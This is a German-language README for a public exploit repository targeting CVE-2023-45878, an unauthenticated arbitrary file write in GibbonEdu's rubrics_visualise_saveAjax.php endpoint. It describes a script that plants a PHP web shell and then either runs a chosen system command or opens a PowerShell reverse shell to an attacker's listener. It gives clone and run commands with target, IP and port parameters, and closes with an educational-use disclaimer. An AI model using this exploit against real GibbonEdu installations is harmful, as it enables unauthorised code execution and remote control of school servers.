
GibbonEdu Beliebiges Dateischreiben zur Remote-Codeausführung
GibbonEdu – Beliebiger Datei-Schreibzugriff zur Web-Shell-Ausführung
Dieses Repository enthält einen Exploit für CVE-2023-45878, eine Schwachstelle zum willkürlichen Schreiben von Dateien (Arbitrary File Write) in GibbonEdu. Die Schwachstelle betrifft den Endpunkt rubrics_visualise_saveAjax.php und ermöglicht es einem nicht authentifizierten Angreifer, beliebige Dateien auf den Webserver hochzuladen.
Dieses Skript nutzt die Schwachstelle aus, um eine PHP-Web-Shell hochzuladen und entweder:
Das Skript unterstützt zwei Betriebsmodi:
--command (-c): Führt einen bestimmten Systembefehl remote aus.--shell (-s): Triggert eine PowerShell-Reverse-Shell zum Listener des Angreifers.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Die unbefugte Nutzung dieses Exploits auf Systemen ohne Erlaubnis ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Exploit entstehen.